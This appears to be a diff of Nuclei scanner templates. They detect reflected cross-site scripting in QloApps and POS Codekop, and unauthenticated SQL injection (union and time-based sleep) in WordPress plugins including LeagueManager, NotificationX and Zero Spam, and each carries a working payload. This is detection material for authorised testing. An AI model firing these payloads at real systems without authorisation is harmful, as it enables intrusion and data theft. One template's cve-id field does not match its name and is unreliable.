author: theamanrawat
severity: medium
description: |
An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via POST controller parameter.
reference:
- https://github.com/webkul/hotelcommerce
- https://flashy-lemonade-192.notion.site/Cross-site-scripting-via-controller-parameter-in-QloApps-1-6-0-97e409ce164f40d195b625b9bf719900
- https://nvd.nist.gov/vuln/detail/CVE-2023-36287
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-36287
cwe-id: CWE-79
metadata:
verified: "true"
tags: cve,cve2023,xss,webkul-qloapps,unauth
http:
- raw:
- |
POST / HTTP/2
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
controller=change-currency9405'-alert(document.domain)-'&id_currency=
matchers-condition: and
matchers:
- type: word
part: body
words:
- "'change-currency9405'-alert(document.domain)-'';"
- "customizationIdMessage"
condition: and
- type: word
part: header
words:
- 'text/html'
- type: status
status:
- 200

50
http/cves/2023/CVE-2023-36289.yaml Normal file
View File

@ -0,0 +1,50 @@
id: CVE-2023-36289
info:
name: Webkul QloApps 1.6.0 - Cross-site Scripting
author: theamanrawat
severity: medium
description: |
An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via POST email_create and back parameter.
reference:
- https://github.com/webkul/hotelcommerce
- https://flashy-lemonade-192.notion.site/Cross-site-scripting-in-POST-Request-via-email_create-and-back-parameter-in-QloApps-1-6-0-e05548203d744daf9047d82fc94b19b7
- https://nvd.nist.gov/vuln/detail/CVE-2023-36289
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-36289
cwe-id: CWE-79
metadata:
verified: "true"
tags: cve,cve2023,xss,webkul-qloapps,unauth
variables:
email: "{{randstr}}@{{rand_base(5)}}.com"
http:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
SubmitCreate=1&ajax=true&back=my-account&controller=authentication&email={{email}}&email_create={{email}}"%20onmouseover=alert(document.domain)%20y=&token={{randstr}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'onmouseover=alert(document.domain)'
- 'hasConfirmation'
condition: and
- type: word
part: header
words:
- 'text/html'
- type: status
status:
- 200

42
http/cves/2023/CVE-2023-36346.yaml Normal file
View File

@ -0,0 +1,42 @@
id: CVE-2023-36346
info:
name: POS Codekop v2.0 - Cross-site Scripting
author: r3Y3r53
severity: medium
description: |
POS Codekop v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the nm_member parameter at print.php.
reference:
- https://yuyudhn.github.io/pos-codekop-vulnerability/
- https://www.youtube.com/watch?v=bbbA-q1syrA
- https://nvd.nist.gov/vuln/detail/CVE-2023-36346
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-30256
cwe-id: CWE-79
metadata:
verified: "true"
tags: cve,cve2023,xss,pos,codekop,unauth
requests:
- method: GET
path:
- "{{BaseURL}}/print.php?nm_member=<script>alert(document.location)</script>"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<script>alert(document.location)</script>"
condition: and
- type: word
part: header
words:
- 'text/html'
- type: status
status:
- 200

35
http/exposed-panels/qdpm-login-panel.yaml Normal file
View File

@ -0,0 +1,35 @@
id: qdpm-login-panel
info:
name: qdPM Login Panel
author: theamanrawat
severity: info
metadata:
verified: "true"
shodan-query: http.favicon.hash:762074255
tags: panel,qdpm,login
http:
- method: GET
path:
- '{{BaseURL}}'
- '{{BaseURL}}/index.php/login'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'qdPM'
- '/index.php/login/restorePassword'
condition: and
- type: word
part: header
words:
- 'text/html'
- type: status
status:
- 200

2
http/vulnerabilities/other/yeswiki-stored-xss.yaml
View File

@ -16,7 +16,7 @@ info:
max-request: 2 max-request: 2
verified: true verified: true
shodan-query: http.html:"yeswiki" shodan-query: http.html:"yeswiki"
tags: yeswiki,xss,stored,huntr tags: yeswiki,xss,stored-xss,huntr
http: http:
- raw: - raw:

44
http/vulnerabilities/wordpress/contus-video-gallery-sqli.yaml Normal file
View File

@ -0,0 +1,44 @@
id: contus-video-gallery-sqli
info:
name: WordPress Video Gallery <= 2.8 - SQL Injection
author: theamanrawat
severity: critical
description: |
The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action (available to unauthenticated users), leading to an SQL injection.
reference:
- https://wpscan.com/vulnerability/b625aee5-8fd1-4f3e-9a9c-d41bdec13243
- https://wordpress.org/plugins/photo-gallery/
remediation: Fixed in version 1.6.3
metadata:
verified: true
tags: sqli,wpscan,wordpress,contus-video-gallery,unauth
variables:
num: '999999999'
http:
- raw:
- |
@timeout: 10s
POST /wp-admin/admin-ajax.php?image_id=123 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
action=GalleryBox&filter_tag=1)" union select * from (select 123)a1 join (select 2)a2 join (select 3)a3 join (select 2)a4 join (select 2)a5 join (select 2)a6 join (select 2)a7 join (select 2)a8 join (select 2)a9 join (select 2)a10 join (select 2)a11 join (select 2)a12 join (select 2)a13 join (select 2)a14 join (select 2)a15 join (select 2)a16 join (select 2)a17 join (select 2)a18 join (select version())a19 join (select md5({{num}}))a20 join (select 2)a21 join (select 2)a22 join (select 2)a23-- -
matchers-condition: and
matchers:
- type: word
part: body
words:
- "c8c605999f3d8352d7bb792cf3fdb25b"
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

30
http/vulnerabilities/wordpress/leaguemanager-sql-injection.yaml Normal file
View File

@ -0,0 +1,30 @@
id: leaguemanager-sql-injection
info:
name: LeagueManager <= 3.9.11 - SQL Injection
author: theamanrawat
severity: critical
description: |
The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action (available to unauthenticated users), leading to an SQL injection.
reference:
- https://wpscan.com/vulnerability/f3be48f5-ae2c-4e27-80ca-664829b8fba3
- https://wordpress.org/plugins/leaguemanager/
metadata:
verified: true
tags: sqli,wp,wp-plugin,wordpress,leaguemanager,unauth
http:
- raw:
- |
@timeout: 10s
GET /?season=1&league_id=1season=1&league_id=1'+AND+(SELECT+1909+FROM+(SELECT(SLEEP(6)))ZiBf)--+qODp&match_day=1&team_id=1&match_day=1&team_id=1 HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "LeagueManagerAjaxL10n")'
condition: and

43
http/vulnerabilities/wordpress/notificationx-sqli.yaml Normal file
View File

@ -0,0 +1,43 @@
id: notificationx-sqli
info:
name: NotificationX < 2.3.12 - SQL Injection
author: theamanrawat
severity: high
description: |
The plugin does not validate and escape the id parameter in its notificationx/v1/notification REST endpoint before using it in a SQL statement, which could allow unauthenticated attackers to perform SQL Injection attacks.
reference:
- https://wpscan.com/vulnerability/d1480717-726d-4be2-95cb-1007a3f010bb
- https://wordpress.org/plugins/notificationx/
remediation: Fixed in version 2.3.12
metadata:
verified: true
tags: sqli,wp,wp-plugin,wordpress,notificationx-sql-injection
http:
- raw:
- |
GET /wp-json/ HTTP/1.1
Host: {{Hostname}}
- |
@timeout: 10s
GET /wp-json/notificationx/v1/notification/1?api_key={{md5('{{apikey}}')}}&id[1]=%3d(SELECT/**/1/**/WHERE/**/SLEEP(6)) HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 401'
- 'contains(content_type, "application/json")'
- 'contains(body, "There is no notification created with this id")'
condition: and
extractors:
- type: regex
name: apikey
group: 1
regex:
- '"home":"(.*?)",'
internal: true

32
http/vulnerabilities/wordpress/zero-spam-sql-injection.yaml Normal file
View File

@ -0,0 +1,32 @@
id: zero-spam-sql-injection
info:
name: WordPress Zero Spam <= 2.1.1 - Blind SQL Injection
author: theamanrawat
severity: critical
description: |
The WordPress Zero Spam WordPress plugin was affected by an Unauthenticated Blind SQL Injection security vulnerability.
reference:
- https://wpscan.com/vulnerability/44cc8d59-9b45-46b7-afaf-894e4ba62dd5
- https://wordpress.org/plugins/zero-spam/
remediation: Fixed in version 2.2.0
metadata:
verified: true
tags: wp,wp-plugin,wordpress,zero-spam,sqli,unauth
http:
- raw:
- |
@timeout: 10s
GET / HTTP/1.1
Host: {{Hostname}}
Client-IP: '+(select(0)from(select(sleep(7)))v)+'
matchers:
- type: dsl
dsl:
- 'duration>=7'
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "zerospam-js")'
condition: and